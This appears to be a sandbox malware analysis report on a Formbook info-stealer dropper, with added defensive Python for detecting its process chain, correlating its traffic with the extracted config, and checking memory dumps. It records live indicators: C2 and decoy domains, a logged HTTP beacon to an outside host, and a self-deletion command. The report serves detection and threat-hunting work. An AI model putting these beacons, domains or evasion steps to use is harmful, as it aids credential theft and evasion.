Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    22-12-2024 00:59

General

  • Target

    ySNxzGtmAt_bin.js

  • Size

    343KB

  • MD5

    2c1b8ce86a48542a827bb302d54eb19c

  • SHA1

    6c5b668d122791450edb50027312f22d22eeb39b

  • SHA256

    c89f8224348c1c86bf84db8a6596f1ff4fdad498669918393fc6325b7a1476e8

  • SHA512

    88bcb4feb1e9a0dfc378d106faa5e979c1505c17483e9ae7e68e8782f0563ca0248f712f0f1b384d7c97b7ef65e0665b72af28a5b9852c030cedec7c67ab5e65

  • SSDEEP

    6144:P+58K9NNqVEmncYRk/ykRCa7ljUuqeYGEirkxMdv1K8glhknGC80F0+WwpOj:lK9NNqVEGVRk/ykRCaRjUGHjrkSXK8gT

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

t01w

Decoy

yeluzishiyanshi.com

thehardtech.xyz

arrowheadk8.site

zaulkunutila.xyz

lookastro.net

congregorecruitment.co.uk

darcyboo.uk

collettesbet.net

ltgpd.com

hiddenapphq.net

haxtrl.online

esenbook.com

jxzyyx.com

ulvabuyout.xyz

instashop.life

vazra.top

ewdvatcuce4.top

zhishi68.com

fabricsandfashion.com

hootcaster.com

Signatures

  • Formbook

    Formbook is an information stealer: it hooks browsers, mail clients and other applications to grab submitted form data and credentials, logs keystrokes and clipboard contents, takes screenshots, and exfiltrates over HTTP to a C2 server that it hides among a list of decoy domains.

  • Formbook family
  • Formbook payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\ySNxzGtmAt_bin.js
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4900
      • C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js"
        3⤵
          PID:2232
        • C:\Users\Admin\AppData\Local\Temp\bin.exe
          "C:\Users\Admin\AppData\Local\Temp\bin.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:748
      • C:\Windows\SysWOW64\wscript.exe
        "C:\Windows\SysWOW64\wscript.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1560
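
    The tree above is the behaviour a detection engineer would key on: wscript.exe executing a .js from %TEMP%, that script host spawning a second script host on a .js written to %APPDATA% and an EXE written to %TEMP%, then, once the payload is running inside a SysWOW64 wscript.exe, cmd.exe /c del removing the dropped EXE. The following Python is an added example and not part of this report: it runs that logic over constructed process-creation events shaped like Sysmon Event ID 1 records. PIDs, image paths and command lines are copied from the tree; parent links follow its indentation and are an assumption; the ATT&CK technique tags in the output are this example's own mapping.

```python
"""Detect the wscript.exe -> dropped EXE -> self-delete chain from this report.

Added example; not part of the sandbox report.  SAMPLE_EVENTS is constructed from
the process tree (PIDs, images, command lines), with parent PIDs taken from the
tree's indentation.  Real Sysmon/EDR telemetry carries more fields than this.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# Folders an unprivileged user can write to and that stagers commonly drop into.
USER_WRITABLE = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_ARG = re.compile(r'"?([A-Za-z]:\\[^"]+?\.(?:js|jse|vbs|vbe|wsf))"?', re.IGNORECASE)
DEL_CMD = re.compile(r'/c\s+del\s+"?([^"]+\.exe)"?', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_host_runs_user_script(ev: ProcEvent) -> bool:
    """wscript/cscript executing a script file that lives in a user-writable folder."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return False
    m = SCRIPT_ARG.search(ev.cmdline)
    return bool(m and USER_WRITABLE.search(m.group(1)))


def detect_chain(events: list[ProcEvent]) -> list[str]:
    """Findings for the three hops of the chain:
    1. a script host runs a script from %APPDATA%/%TEMP%,
    2. that script host spawns an EXE from a user-writable folder,
    3. cmd.exe later runs '/c del' on that same EXE (self-cleanup)."""
    by_pid = {e.pid: e for e in events}
    findings: list[str] = []
    dropped_exes: set[str] = set()

    for ev in events:
        parent = by_pid.get(ev.ppid)
        if script_host_runs_user_script(ev):
            findings.append(f"[T1059.007] pid {ev.pid}: script host runs {ev.cmdline}")
        if (parent and basename(parent.image) in SCRIPT_HOSTS
                and ev.image.lower().endswith(".exe")
                and USER_WRITABLE.search(ev.image)):
            dropped_exes.add(ev.image.lower())
            findings.append(f"[T1204] pid {ev.pid}: {basename(parent.image)} "
                            f"(pid {parent.pid}) launched dropped EXE {ev.image}")

    for ev in events:
        if basename(ev.image) != "cmd.exe":
            continue
        m = DEL_CMD.search(ev.cmdline)
        if m and m.group(1).lower() in dropped_exes:
            findings.append(f"[T1070.004] pid {ev.pid}: self-deletion of {m.group(1)}")
    return findings


# Constructed from the process tree in this report (not captured telemetry).
SAMPLE_EVENTS = [
    ProcEvent(3568, 1, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(4900, 3568, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\ySNxzGtmAt_bin.js"),
    ProcEvent(2232, 4900, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js"'),
    ProcEvent(748, 4900, r"C:\Users\Admin\AppData\Local\Temp\bin.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\bin.exe"'),
    ProcEvent(2520, 3568, r"C:\Windows\SysWOW64\wscript.exe", r'"C:\Windows\SysWOW64\wscript.exe"'),
    ProcEvent(1560, 2520, r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"'),
]

if __name__ == "__main__":
    for line in detect_chain(SAMPLE_EVENTS):
        print(line)
```

    Note that the SysWOW64 wscript.exe (pid 2520) is launched with no script argument at all, which is why the first rule does not fire on it; an empty-argument script host spawned by Explorer is itself worth a separate, lower-confidence rule, since a legitimate user launching wscript.exe always passes a file.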

    Network

    • [US] DNS 149.220.183.52.in-addr.arpa (via 8.8.8.8:53)
      Request: 149.220.183.52.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 81.144.22.2.in-addr.arpa (via 8.8.8.8:53)
      Request: 81.144.22.2.in-addr.arpa IN PTR
      Response: 81.144.22.2.in-addr.arpa IN PTR a2-22-144-81.deploy.static.akamaitechnologies.com
    • [US] DNS 72.32.126.40.in-addr.arpa (via 8.8.8.8:53)
      Request: 72.32.126.40.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 95.221.229.192.in-addr.arpa (via 8.8.8.8:53)
      Request: 95.221.229.192.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 13.86.106.20.in-addr.arpa (via 8.8.8.8:53)
      Request: 13.86.106.20.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 28.118.140.52.in-addr.arpa (via 8.8.8.8:53)
      Request: 28.118.140.52.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 197.87.175.4.in-addr.arpa (via 8.8.8.8:53)
      Request: 197.87.175.4.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 171.39.242.20.in-addr.arpa (via 8.8.8.8:53)
      Request: 171.39.242.20.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS 107.12.20.2.in-addr.arpa (via 8.8.8.8:53)
      Request: 107.12.20.2.in-addr.arpa IN PTR
      Response: 107.12.20.2.in-addr.arpa IN PTR a2-20-12-107.deploy.static.akamaitechnologies.com
    • [US] DNS www.vazra.top (via 8.8.8.8:53)
      Request: www.vazra.top IN A
      Response: (empty)
    • [US] DNS www.homecrowds.net (via 8.8.8.8:53)
      Request: www.homecrowds.net IN A
      Response: www.homecrowds.net IN CNAME parkingpage.namecheap.com
                parkingpage.namecheap.com IN A 91.195.240.19
    • [DE] GET http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G
      Process: Explorer.EXE
      Remote address: 91.195.240.19:80
      Request:
        GET /t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G HTTP/1.1
        Host: www.homecrowds.net
        Connection: close
      Response:
        HTTP/1.1 403 Forbidden
        content-length: 93
        cache-control: no-cache
        content-type: text/html
        connection: close
    • [US] DNS 19.240.195.91.in-addr.arpa (via 8.8.8.8:53)
      Request: 19.240.195.91.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS www.omgsweepsship.com (via 8.8.8.8:53)
      Request: www.omgsweepsship.com IN A
      Response: (empty)
    • [US] DNS 13.227.111.52.in-addr.arpa (via 8.8.8.8:53)
      Request: 13.227.111.52.in-addr.arpa IN PTR
      Response: (empty)
    • [US] DNS www.ulvabuyout.xyz (via 8.8.8.8:53)
      Request: www.ulvabuyout.xyz IN A
      Response: (empty)
    • [US] DNS www.adanarinoplasti.xyz (via 8.8.8.8:53)
      Request: www.adanarinoplasti.xyz IN A
      Response: (empty)
    • [US] DNS www.secure-internetbanking-help.com (via 8.8.8.8:53)
      Request: www.secure-internetbanking-help.com IN A
      Response: (empty)
    Connection summary (protocol, process, bytes sent / received, packets sent / received):

    • 91.195.240.19:80  http  Explorer.EXE  404 B / 376 B  5 / 4
      GET http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G → HTTP 403
    • 8.8.8.8:53  dns  73 B / 147 B  1 / 1
      149.220.183.52.in-addr.arpa
    • 8.8.8.8:53  dns  70 B / 133 B  1 / 1
      81.144.22.2.in-addr.arpa
    • 8.8.8.8:53  dns  71 B / 157 B  1 / 1
      72.32.126.40.in-addr.arpa
    • 8.8.8.8:53  dns  73 B / 144 B  1 / 1
      95.221.229.192.in-addr.arpa
    • 8.8.8.8:53  dns  71 B / 157 B  1 / 1
      13.86.106.20.in-addr.arpa
    • 8.8.8.8:53  dns  72 B / 158 B  1 / 1
      28.118.140.52.in-addr.arpa
    • 8.8.8.8:53  dns  71 B / 157 B  1 / 1
      197.87.175.4.in-addr.arpa
    • 8.8.8.8:53  dns  72 B / 158 B  1 / 1
      171.39.242.20.in-addr.arpa
    • 8.8.8.8:53  dns  70 B / 133 B  1 / 1
      107.12.20.2.in-addr.arpa
    • 8.8.8.8:53  dns  59 B / 129 B  1 / 1
      www.vazra.top
    • 8.8.8.8:53  dns  64 B / 119 B  1 / 1
      www.homecrowds.net → 91.195.240.19
    • 8.8.8.8:53  dns  72 B / 156 B  1 / 1
      19.240.195.91.in-addr.arpa
    • 8.8.8.8:53  dns  67 B / 140 B  1 / 1
      www.omgsweepsship.com
    • 8.8.8.8:53  dns  72 B / 158 B  1 / 1
      13.227.111.52.in-addr.arpa
    • 8.8.8.8:53  dns  64 B / 129 B  1 / 1
      www.ulvabuyout.xyz
    • 8.8.8.8:53  dns  69 B / 134 B  1 / 1
      www.adanarinoplasti.xyz
    • 8.8.8.8:53  dns  81 B / 154 B  1 / 1
      www.secure-internetbanking-help.com
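
    The single beacon in this run shows the shape worth matching on: one path segment equal to the campaign id extracted from the config (t01w), followed by two parameters with short random names and opaque base64-like values that carry raw '+' and '/' characters. The DNS lookups are the other half of the picture: Formbook walks its embedded domain list, and only some of the names queried here (vazra.top, ulvabuyout.xyz) appear among the twenty decoys extracted above, while homecrowds.net, the one host that actually answered, does not. The Python below is an added example and not part of this report: it correlates the observed traffic with the extracted config using only data copied from this page. The beacon-shape heuristic is an assumption drawn from this one request, not a published specification of the family, and hosts that fall outside the extracted list should be treated as candidate C2 or unextracted config entries, not dismissed.

```python
"""Correlate the observed HTTP/DNS activity with the extracted Formbook config.

Added example, not part of this sandbox report.  CONFIG and the sample traffic are
copied from the report; the beacon-shape heuristic is an assumption drawn from the
single GET observed here, not a published specification of the family.
"""
from __future__ import annotations
import re
from urllib.parse import urlsplit

CONFIG = {
    "campaign": "t01w",
    "decoys": {
        "yeluzishiyanshi.com", "thehardtech.xyz", "arrowheadk8.site", "zaulkunutila.xyz",
        "lookastro.net", "congregorecruitment.co.uk", "darcyboo.uk", "collettesbet.net",
        "ltgpd.com", "hiddenapphq.net", "haxtrl.online", "esenbook.com", "jxzyyx.com",
        "ulvabuyout.xyz", "instashop.life", "vazra.top", "ewdvatcuce4.top", "zhishi68.com",
        "fabricsandfashion.com", "hootcaster.com",
    },
}

KEY = re.compile(r"^[A-Za-z0-9]{2,12}$")          # short, random-looking parameter names
BLOB = re.compile(r"^[A-Za-z0-9+/=_-]{8,}$")      # opaque base64-like value


def raw_params(query: str) -> list[tuple[str, str]]:
    """Split the query string WITHOUT percent/plus decoding.  urllib's parse_qsl
    would turn the raw '+' in the blob into spaces; here the value is opaque and
    the unescaped '+' and '/' are themselves part of what we want to match."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_beacon(url: str) -> dict | None:
    """Return host, campaign and params if the URL has the shape seen in this report:
    exactly one path segment (the campaign id) and at least two key=blob parameters."""
    u = urlsplit(url)
    segments = [s for s in u.path.split("/") if s]
    params = raw_params(u.query)
    if len(segments) != 1 or len(params) < 2:
        return None
    if not all(KEY.match(k) and BLOB.match(v) for k, v in params):
        return None
    return {"host": u.hostname, "campaign": segments[0], "params": dict(params)}


def registered_name(host: str) -> str:
    """Drop a leading 'www.' so DNS names match the config's bare domains.  (A public
    suffix list is the robust way to do this; every decoy here is www. + domain.)"""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def triage(http_urls: list[str], dns_names: list[str], config: dict) -> dict:
    beacons = [b for b in (parse_beacon(u) for u in http_urls) if b]
    # Reverse (PTR) lookups are excluded: they carry no malware-chosen hostname.
    queried = {registered_name(n) for n in dns_names if not n.endswith(".in-addr.arpa")}
    beacon_hosts = {registered_name(b["host"]) for b in beacons}
    return {
        "beacons": beacons,
        "campaign_mismatch": [b["host"] for b in beacons if b["campaign"] != config["campaign"]],
        "dns_in_config": sorted(queried & config["decoys"]),
        "dns_not_in_config": sorted(queried - config["decoys"]),
        "beacon_hosts_not_in_config": sorted(beacon_hosts - config["decoys"]),
    }


# Copied from the Network section of this report.
SAMPLE_HTTP = [
    "http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G",
]
SAMPLE_DNS = [
    "www.vazra.top", "www.homecrowds.net", "19.240.195.91.in-addr.arpa",
    "www.omgsweepsship.com", "www.ulvabuyout.xyz", "www.adanarinoplasti.xyz",
    "www.secure-internetbanking-help.com",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTTP, SAMPLE_DNS, CONFIG).items():
        print(f"{key}: {value}")
```

    The 403 from 91.195.240.19 is a Namecheap parking page, so the domain that did resolve was not serving the C2 at analysis time; the four names that neither resolved nor appear in the extracted decoy list are the ones to add to blocklists and retro-hunt for in proxy logs.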

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bin.exe

      Filesize

      185KB

      MD5

      6b9e28b6f51709866a46b4a8b98a1b6f

      SHA1

      1dcbaffb6aa748637216c498f0fee1f6d399263a

      SHA256

      4d47123169619362bf77feb0a764db9f2773f51374eb7a4ec71cc6f9b01d15f6

      SHA512

      557e807c93283552e7da7f34c8002af3657cabdacfbeb86d5b4336250ef67ccaa54a46bc084105028fd331c6f0e012bd064d7021ca8220d0cbdc5a7a1577f362

    • C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js

      Filesize

      2KB

      MD5

      63eddccafac5a2d46e70ad8368008a2c

      SHA1

      999b0c61359b570044b0f0be55bc490322e80ae6

      SHA256

      5c571d13ce29d36517e2e42e2999627e8d58a3ce037117ab13a904c5fe9b0953

      SHA512

      0775702f1a89fa990c193a3fa123120d2d236535c7e5829a1f806bb4f6bdfd381cb2f2c7b5ab69bd906853110e6dfcc3db1cc3704f2db58ca112d0d7596bc930

    • memory/748-10-0x0000000001880000-0x0000000001BCA000-memory.dmp

      Filesize

      3.3MB

    • memory/748-12-0x0000000000190000-0x00000000001BF000-memory.dmp

      Filesize

      188KB

    • memory/748-11-0x00000000001AF000-0x00000000001B0000-memory.dmp

      Filesize

      4KB

    • memory/2520-14-0x0000000000500000-0x0000000000527000-memory.dmp

      Filesize

      156KB

    • memory/2520-15-0x0000000000500000-0x0000000000527000-memory.dmp

      Filesize

      156KB

    • memory/2520-16-0x0000000000B60000-0x0000000000B8F000-memory.dmp

      Filesize

      188KB

    • memory/3568-13-0x0000000002F70000-0x0000000003066000-memory.dmp

      Filesize

      984KB

    • memory/3568-17-0x0000000002F70000-0x0000000003066000-memory.dmp

      Filesize

      984KB

    • memory/3568-21-0x0000000007530000-0x00000000075CC000-memory.dmp

      Filesize

      624KB
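
    The dump names encode the region each one was taken from, so the Filesize labels can be recomputed and the regions compared across processes. The 188KB region appears once in the dropper bin.exe (pid 748, 0x190000-0x1BF000) and once in the SysWOW64 wscript.exe it was injected into (pid 2520, 0xB60000-0xB8F000), which is the footprint the SetThreadContext and MapViewOfSection signatures above predict; the 4KB dump 748-11 lies inside the 188KB one. The Python below is an added example and not part of this report: it parses the names copied from this list, checks every size label, and reports same-size regions across PIDs and nested regions. The name layout memory/<pid>-<seq>-<start>-<end>-memory.dmp is read off the names shown here and is an assumption about the sandbox's naming.

```python
"""Sanity-check the memory-dump entries listed above.

Added example, not part of the sandbox report.  The dump names and Filesize labels
are copied from the Downloads list; the name layout
memory/<pid>-<seq>-<start>-<end>-memory.dmp is inferred from those names.
"""
import re
from collections import defaultdict

DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# (dump name, Filesize label shown in the report)
DUMPS = [
    ("memory/748-10-0x0000000001880000-0x0000000001BCA000-memory.dmp", "3.3MB"),
    ("memory/748-12-0x0000000000190000-0x00000000001BF000-memory.dmp", "188KB"),
    ("memory/748-11-0x00000000001AF000-0x00000000001B0000-memory.dmp", "4KB"),
    ("memory/2520-14-0x0000000000500000-0x0000000000527000-memory.dmp", "156KB"),
    ("memory/2520-15-0x0000000000500000-0x0000000000527000-memory.dmp", "156KB"),
    ("memory/2520-16-0x0000000000B60000-0x0000000000B8F000-memory.dmp", "188KB"),
    ("memory/3568-13-0x0000000002F70000-0x0000000003066000-memory.dmp", "984KB"),
    ("memory/3568-17-0x0000000002F70000-0x0000000003066000-memory.dmp", "984KB"),
    ("memory/3568-21-0x0000000007530000-0x00000000075CC000-memory.dmp", "624KB"),
]


def parse_dump(name: str) -> dict:
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name}")
    pid, seq = int(m.group(1)), int(m.group(2))
    start, end = int(m.group(3), 16), int(m.group(4), 16)
    if end <= start or start % 0x1000 or end % 0x1000:
        raise ValueError(f"region empty or not page-aligned: {name}")
    return {"pid": pid, "seq": seq, "start": start, "end": end, "size": end - start}


def human(size: int) -> str:
    """Round the way the report's labels do: whole KB below 1 MiB, one decimal MB above."""
    return f"{size / 2**20:.1f}MB" if size >= 2**20 else f"{size // 1024}KB"


def size_mismatches(dumps):
    """Entries whose address range does not reproduce the Filesize label shown."""
    return [name for name, label in dumps if human(parse_dump(name)["size"]) != label]


def same_size_across_pids(dumps):
    """Region sizes that occur in more than one process.  Identical sizes in the
    dropper and in the process it injected into are consistent with the payload
    being written into the second process; it is a hint, not proof the bytes match."""
    pids_by_size = defaultdict(set)
    for name, _ in dumps:
        d = parse_dump(name)
        pids_by_size[d["size"]].add(d["pid"])
    return {size: sorted(pids) for size, pids in pids_by_size.items() if len(pids) > 1}


def nested_regions(dumps):
    """(inner seq, outer seq) pairs where a smaller dump lies inside a larger dump
    of the same process, e.g. a single page dumped again out of a bigger region."""
    regions = [parse_dump(name) for name, _ in dumps]
    pairs = []
    for a in regions:
        for b in regions:
            if (a["pid"] == b["pid"] and a["size"] < b["size"]
                    and b["start"] <= a["start"] and a["end"] <= b["end"]):
                pairs.append((a["seq"], b["seq"]))
    return pairs


if __name__ == "__main__":
    print("size label mismatches:", size_mismatches(DUMPS))
    print("same-size regions in several PIDs:",
          {hex(s): p for s, p in same_size_across_pids(DUMPS).items()})
    print("nested regions (inner, outer):", nested_regions(DUMPS))
```

    Dumps 2520-14/2520-15 and 3568-13/3568-17 are the same region captured twice, so comparing their hashes is the quick way to tell whether the injected code was still being written when the first snapshot was taken.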
